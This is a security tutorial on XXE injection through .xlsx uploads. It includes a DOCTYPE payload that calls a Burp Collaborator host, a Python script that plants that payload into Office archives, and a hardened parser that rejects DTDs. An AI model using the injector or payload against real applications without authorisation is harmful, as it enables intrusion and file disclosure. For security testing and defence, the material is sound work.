XML External Entity (XXE) injection is possible because the Document Type Definition (DTD) part of an XML document lets the author declare their own entities, including entities whose content is loaded from an external URI. Depending on the server-side XML processing engine and the configuration of the environment, this type of vulnerability can be exploited in different ways: listing directories on the system, reading application and system files, retrieving the application user's password hashes, and in some setups even transferring files to the server or executing system commands.
The classic scenario is a request whose body is XML, to which we add the part that declares our own entity. The vulnerability can, however, also appear in an application that processes Excel (.xlsx), Word (.docx) or PowerPoint (.pptx) files in some way. This is because these formats follow the Office Open XML (OOXML) standard: each file is simply a ZIP archive containing several XML files.
The quick attack scenario is as follows:
1. Create a new blank .xlsx document. Google Sheets can be used for this purpose; download the empty sheet as .xlsx.
2. Open Burp Suite Professional -> Burp -> Burp Collaborator client and click the “Copy to clipboard” button. In my case the server address was lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net.
Alternatively, if you have a publicly reachable IP address, a simple HTTP server in Python will do: “python3 -m http.server 8080”. Incoming requests then appear in its access log.
3. Open the downloaded file with 7-Zip. Since an .xlsx is a ZIP archive, 7-Zip browses it like a folder and offers to update the archive after you edit a file inside it.
4. Edit the “workbook.xml” file in the “xl” directory by adding the following code directly after the <?xml ...?> declaration and before the <workbook> root element (of course, replacing the server address with your own):
<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net/"> %xxe; ]>
NOTE: In one of the applications I tested, the XXE vulnerability only showed up after editing “[Content_Types].xml”, so it is worth checking this file too.
5. Save your changes and upload the file to the application you are testing.
6. Now check the Collaborator client for any incoming requests.
7. Enjoy 🙂: you have just confirmed an XXE vulnerability in the tested application and can proceed to exploit it further.
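The whole procedure above, automated as an added example (this is not code from the original post): a Python script that takes an .xlsx, rewrites xl/workbook.xml (or any other part, such as [Content_Types].xml) so that the DOCTYPE from step 4 sits between the XML declaration and the root element, and writes a new archive. The blank workbook it builds for offline use is constructed here and contains only the parts the example touches; the Collaborator hostname is the one from the post and the function names are this example's own. Because Office writes standalone="yes" into every part and a parser that honours that attribute may skip external parameter entities, the injector strips it by default (pass drop_standalone=False to keep the declaration untouched).

```python
"""Inject the post's XXE probe into an OOXML archive (added example, not the post's code)."""
import io
import re
import sys
import zipfile

# Payload from step 4: an external parameter entity referenced inside the
# internal DTD subset. A parser that loads external DTDs fetches the URL.
DOCTYPE_TEMPLATE = '<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "{url}"> %xxe; ]>'

XML_DECL_RE = re.compile(rb"^\s*<\?xml[^>]*\?>")
STANDALONE_RE = re.compile(rb'\s+standalone\s*=\s*["\']yes["\']')


def inject_dtd(part: bytes, callback_url: str, drop_standalone: bool = True) -> bytes:
    """Place the DOCTYPE between the XML declaration (if any) and the root element.

    A DOCTYPE is only legal at that position, so it cannot simply be prepended
    when the part starts with <?xml ...?>. standalone="yes" is removed by
    default so that parsers honouring it still consider external entities.
    """
    if b"<!DOCTYPE" in part:
        raise ValueError("part already carries a DOCTYPE")
    payload = DOCTYPE_TEMPLATE.format(url=callback_url).encode()
    m = XML_DECL_RE.match(part)
    if not m:
        return payload + part
    decl = part[: m.end()]
    if drop_standalone:
        decl = STANDALONE_RE.sub(b"", decl)
    return decl + payload + part[m.end():]


def poison_ooxml(document: bytes, callback_url: str,
                 target: str = "xl/workbook.xml") -> bytes:
    """Return a copy of the archive in which `target` carries the DTD.

    ZIP entries cannot be edited in place, so every part is copied into a new
    archive, preserving names and order ([Content_Types].xml stays first).
    """
    with zipfile.ZipFile(io.BytesIO(document)) as src:
        if target not in src.namelist():
            raise KeyError(f"{target} not found in archive")
        out = io.BytesIO()
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
            for info in src.infolist():
                data = src.read(info.filename)
                if info.filename == target:
                    data = inject_dtd(data, callback_url)
                dst.writestr(info.filename, data)
    return out.getvalue()


def read_part(document: bytes, name: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(document)) as zf:
        return zf.read(name)


def part_names(document: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(document)) as zf:
        return zf.namelist()


def build_blank_xlsx() -> bytes:
    """Constructed stand-in for a blank workbook: only the parts this example touches."""
    decl = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    parts = {
        "[Content_Types].xml": decl
            + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-'
            'officedocument.spreadsheetml.sheet.main+xml"/></Types>',
        "_rels/.rels": decl
            + '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
            'relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>',
        "xl/workbook.xml": decl
            + '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
            '<sheets/></workbook>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    # usage: python poison_xlsx.py URL [in.xlsx out.xlsx]
    url = sys.argv[1] if len(sys.argv) > 1 else \
        "http://lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net/"
    if len(sys.argv) > 3:
        with open(sys.argv[2], "rb") as fh:
            data = fh.read()
    else:
        data = build_blank_xlsx()  # no input file: use the constructed blank workbook
    poisoned = poison_ooxml(data, url)
    if len(sys.argv) > 3:
        with open(sys.argv[3], "wb") as fh:
            fh.write(poisoned)
    print(read_part(poisoned, "xl/workbook.xml").decode())
```

Run it as python poison_xlsx.py http://your-collaborator-host/ blank.xlsx poisoned.xlsx; without the file arguments it poisons the constructed workbook and prints the resulting xl/workbook.xml. Pass target="[Content_Types].xml" to poison_ooxml to cover the case from the note in step 4, then upload the output and watch the Collaborator client as in step 6.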
The most common protection against XXE is to configure the XML parser to reject DTDs entirely, or at minimum to disable the loading of external entities and external DTDs. For an application that accepts Office documents, this setting has to apply to every XML part extracted from the archive, not only to the workbook or document body, since any of them may reach a parser.
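A hardened parser for the server side, as an added example that is not part of the original post. It uses Python's standard-library expat binding because the post does not say which engine the tested application ran; the equivalent knobs in other stacks are the disallow-doctype-decl feature in Java's Xerces-based parsers, DtdProcessing.Prohibit in .NET, and leaving XML_PARSE_NOENT and XML_PARSE_DTDLOAD off in libxml2. The sample parts are constructed here, with the probe from step 4 placed in both xl/workbook.xml and [Content_Types].xml, and the check runs over every part because, as the note in step 4 says, the vulnerable parser is not necessarily the one reading workbook.xml.

```python
"""Reject DTDs in OOXML parts before parsing (added example, not the post's code)."""
import xml.parsers.expat as expat


class DTDForbidden(ValueError):
    """An OOXML part carried a DOCTYPE; no Office part legitimately needs one."""


def hardened_parser():
    """Expat parser that fails closed on every DTD-related feature."""
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires on '<!DOCTYPE' before any entity declaration is processed,
        # so the external parameter entity never gets a chance to be fetched.
        raise DTDForbidden(f"DOCTYPE {name!r} (SYSTEM {sysid!r}) rejected")

    parser.StartDoctypeDeclHandler = reject_doctype
    # Defence in depth should a DOCTYPE ever slip through:
    # never expand external parameter entities such as %xxe; ...
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    # ... and abort on external general entities (returning 0 fails the parse).
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    return parser


def parse_part(part: bytes) -> dict:
    """Parse one XML part, returning its root element name and element count."""
    result = {"root": None, "elements": 0}

    def start(name, attrs):
        if result["root"] is None:
            result["root"] = name
        result["elements"] += 1

    parser = hardened_parser()
    parser.StartElementHandler = start
    parser.Parse(part, True)
    return result


def unsafe_parts(parts: dict) -> list:
    """Names of parts the hardened parser refuses (DTD present or malformed XML)."""
    bad = []
    for name, data in parts.items():
        try:
            parse_part(data)
        except (DTDForbidden, expat.ExpatError):
            bad.append(name)
    return bad


# Constructed sample parts: a clean workbook, one carrying the post's probe, and a
# [Content_Types].xml with the same probe (the part the post's note mentions).
DECL = b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
PROBE = (b'<!DOCTYPE root [ <!ENTITY % xxe SYSTEM '
         b'"http://lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net/"> %xxe; ]>')
CLEAN_WORKBOOK = DECL + (b'<workbook xmlns="http://schemas.openxmlformats.org/'
                         b'spreadsheetml/2006/main"><sheets/></workbook>')
POISONED_WORKBOOK = DECL + PROBE + CLEAN_WORKBOOK[len(DECL):]
POISONED_TYPES = DECL + PROBE + (b'<Types xmlns="http://schemas.openxmlformats.org/'
                                 b'package/2006/content-types"/>')
# Even a harmless-looking internal-only DTD is refused: the rule is "no DTD",
# not "no external DTD", which keeps the decision independent of parser defaults.
INTERNAL_ONLY = DECL + b'<!DOCTYPE workbook [ <!ENTITY x "y"> ]><workbook>&x;</workbook>'

SAMPLE_PARTS = {
    "xl/workbook.xml": POISONED_WORKBOOK,
    "[Content_Types].xml": POISONED_TYPES,
    "xl/styles.xml": DECL + b"<styleSheet/>",
    "docProps/app.xml": INTERNAL_ONLY,
}

if __name__ == "__main__":
    print(parse_part(CLEAN_WORKBOOK))   # {'root': 'workbook', 'elements': 2}
    print(unsafe_parts(SAMPLE_PARTS))    # the three parts that carry a DOCTYPE
```

In a real upload handler, iterate over every entry of the ZIP archive, feed each XML part through parse_part (or a parser configured the same way) and reject the whole document if any part is refused; rejecting on the DOCTYPE token itself means the decision is taken before any network or file access could occur.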